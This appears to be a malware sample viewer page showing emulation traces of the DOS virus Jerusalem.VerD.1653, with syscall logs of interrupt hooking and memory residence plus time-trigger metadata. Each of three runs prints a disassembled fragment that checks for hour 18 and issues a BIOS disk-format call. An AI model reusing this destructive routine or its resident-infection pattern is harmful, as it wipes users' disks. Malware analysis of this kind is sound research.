Sample viewer

vx.netlux.org/Virus.DOS.Jerusalem.VerD.1653

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:05:18.109117345Z 240 PC: 12acd | UNKNOWN!
2018-12-17T23:05:18.111041369Z 240 PC: 12afd | UNKNOWN!
2018-12-17T23:05:18.112450987Z 74 PC: 12b88 | Reallocate memory
2018-12-17T23:05:18.114229787Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:05:18.116511942Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:05:18.117969907Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x12
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: nop
0x12c01: jmp 0x12c00
0x12c03: add al, dh
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
2018-12-17T23:05:18.120430807Z 75 PC: 12c19 | Execute program
2018-12-17T23:05:18.13592608Z 73 PC: 12c1f | Release memory
2018-12-17T23:05:18.137678363Z 77 PC: 12c23 | Get program return code
2018-12-17T23:05:18.139256289Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":18,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15153,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:45.678096773Z 240 PC: 12acd | UNKNOWN!
2018-12-25T12:42:45.679620472Z 240 PC: 12afd | UNKNOWN!
2018-12-25T12:42:45.696665211Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:42:45.698258662Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.699504601Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.701940072Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x12
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: nop
0x12c01: jmp 0x12c00
0x12c03: add al, dh
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
2018-12-25T12:42:45.704748558Z 25 PC: 12be7 | Get default drive

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15153,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:45.736245811Z 240 PC: 12acd | UNKNOWN!
2018-12-25T12:42:45.737597978Z 240 PC: 12afd | UNKNOWN!
2018-12-25T12:42:45.73879121Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:42:45.740707565Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.742853733Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:42:45.744288483Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x12
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: nop
0x12c01: jmp 0x12c00
0x12c03: add al, dh
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
2018-12-25T12:42:45.746416385Z 75 PC: 12c19 | Execute program
2018-12-25T12:42:45.764664501Z 73 PC: 12c1f | Release memory
2018-12-25T12:42:45.76707745Z 77 PC: 12c23 | Get program return code
2018-12-25T12:42:45.768466791Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')